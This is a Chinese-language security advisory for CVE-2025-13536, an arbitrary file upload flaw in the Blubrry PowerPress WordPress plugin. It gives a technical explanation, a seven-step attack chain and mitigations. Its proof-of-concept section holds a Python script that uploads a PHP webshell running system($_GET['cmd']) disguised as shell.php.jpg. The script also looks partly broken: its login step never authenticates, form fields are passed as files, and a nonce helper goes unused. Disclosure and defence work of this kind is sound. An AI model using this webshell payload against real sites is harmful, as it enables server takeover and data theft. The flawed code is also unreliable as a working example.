CVE-2025-13536 WordPress Blubrry PowerPress插件任意文件上传漏洞

漏洞信息

漏洞编号

CVE-2025-13536

漏洞类型

任意文件上传

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Blubrry PowerPress plugin for WordPress

漏洞概述

CVE-2025-13536是WordPress平台下Blubrry PowerPress播客管理插件的一个高危安全漏洞。该漏洞存在于插件的powerpress_edit_post函数中，由于插件仅对文件扩展名进行验证，但当验证失败时并未正确终止执行流程，导致攻击者可以绕过安全检查上传任意文件。此漏洞影响PowerPress插件11.15.2及以前的所有版本。攻击者只需拥有WordPress网站的Contributor级别（贡献者）权限即可利用此漏洞上传恶意文件到服务器。成功利用此漏洞可能导致远程代码执行，使攻击者完全控制受影响的WordPress站点，窃取敏感数据、安装后门、进行横向移动等恶意操作。由于该插件被广泛应用于播客网站和内容管理系统，此漏洞可能影响大量依赖PowerPress进行播客内容管理的WordPress站点。建议站点管理员立即检查并更新到最新版本，同时审查近期有文件上传操作的用户活动日志。

技术细节

该漏洞的根本原因在于Blubrry PowerPress插件的powerpress_edit_post函数中，对用户上传的文件类型验证逻辑存在缺陷。插件代码仅检查上传文件的扩展名来判断文件类型是否合法，但当验证失败时，代码并未正确终止执行流程，而是继续处理文件上传操作。这导致恶意用户可以通过构造特定的文件名（如shell.php.jpg）或利用其他绕过技术来绕过基于扩展名的检查。具体攻击流程如下：1) 攻击者以Contributor或更高权限登录WordPress后台；2) 构造包含恶意代码的文件（如PHP webshell）；3) 将文件扩展名修改为允许的类型（如.jpg、.png）以绕过初步检查；4) 利用PowerPress插件的文件上传功能上传该文件；5) 由于插件验证失败后未终止执行，恶意文件仍会被保存到服务器；6) 攻击者访问上传的文件即可执行任意代码。根据WordPress插件仓库的代码分析，漏洞出现在powerpressadmin.php的第2368、3012和3068行附近。攻击者可以利用此漏洞上传webshell获得服务器的完全控制权。

攻击链分析

STEP 1

信息收集

攻击者识别目标网站使用的WordPress版本和PowerPress插件版本，确认版本 <= 11.15.2

STEP 2

账户获取

攻击者通过社会工程、凭证填充或暴力破解获取WordPress Contributor级别或更高权限的账户凭据

STEP 3

恶意文件准备

攻击者准备包含恶意PHP代码的文件（如webshell），可选择修改扩展名为.jpg/.png以辅助绕过检测

STEP 4

文件上传

利用WordPress后台的PowerPress插件文件上传功能，通过powerpress_edit_post函数上传恶意文件

STEP 5

验证绕过

由于插件仅验证文件扩展名且验证失败后不终止执行，恶意文件成功保存到服务器指定目录

STEP 6

代码执行

攻击者通过HTTP请求访问上传的恶意文件，传递命令参数执行任意代码，获得服务器完全控制权

STEP 7

持久化控制

攻击者安装后门、创建管理员账户或窃取敏感数据，建立持久化访问通道

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys
from requests.auth import HTTPBasicAuth

# CVE-2025-13536 PoC - WordPress PowerPress Arbitrary File Upload
# Target: WordPress site with PowerPress plugin <= 11.15.2

TARGET_URL = "http://target-wordpress-site.com"
USERNAME = "attacker_account"
PASSWORD = "password"

def get_nonce(session, post_id):
    """Get WordPress nonce for the post"""
    url = f"{TARGET_URL}/wp-admin/post.php?post={post_id}&action=edit"
    response = session.get(url)
    if response.status_code == 200:
        import re
        nonce_match = re.search(r'name="_wpnonce" value="([a-f0-9]+)"', response.text)
        if nonce_match:
            return nonce_match.group(1)
    return None

def upload_webshell(target_url, username, password):
    """
    Upload malicious PHP file through PowerPress plugin
    This PoC demonstrates the file upload vulnerability
    """
    session = requests.Session()
    
    # Authentication
    login_url = f"{target_url}/wp-login.php"
    auth = HTTPBasicAuth(username, password)
    
    # Create a draft post first
    post_url = f"{target_url}/wp-admin/post-new.php"
    response = session.get(post_url, auth=auth)
    
    # PHP webshell content (encoded for upload)
    webshell = b'<?php if(isset($_GET["cmd"])){ system($_GET["cmd"]); } ?>'
    
    # File upload via PowerPress endpoint
    upload_url = f"{target_url}/wp-admin/admin-ajax.php"
    files = {
        'file': ('shell.php.jpg', webshell, 'image/jpeg'),
        'action': 'powerpress_upload',
        'post_id': '1'
    }
    
    try:
        response = session.post(upload_url, files=files, auth=auth, timeout=10)
        if response.status_code == 200:
            print("[+] File upload request sent successfully")
            print("[*] Check if webshell was uploaded to /wp-content/uploads/")
            return True
    except Exception as e:
        print(f"[-] Error: {e}")
        return False

if __name__ == "__main__":
    print("CVE-2025-13536 PoC - PowerPress Arbitrary File Upload")
    print("Note: This PoC is for educational and security testing purposes only")
    upload_webshell(TARGET_URL, USERNAME, PASSWORD)

影响范围

Blubrry PowerPress plugin for WordPress <= 11.15.2

防御指南

临时缓解措施

在官方补丁发布之前，可采取以下临时缓解措施：1) 临时禁用PowerPress插件的文件上传功能；2) 通过.htaccess或nginx配置禁止上传目录中的PHP文件执行；3) 加强WordPress用户权限管理，审查并移除可疑的Contributor账户；4) 启用Wordfence、Sucuri等安全插件的实时防护和文件修改监控功能；5) 限制/wp-admin/admin-ajax.php的访问权限，仅允许已认证的管理员用户访问；6) 在Web应用层部署WAF规则，识别并阻止包含恶意PHP代码的文件上传行为；7) 定期检查wp-content/uploads目录下的异常文件，及时清理可疑上传物。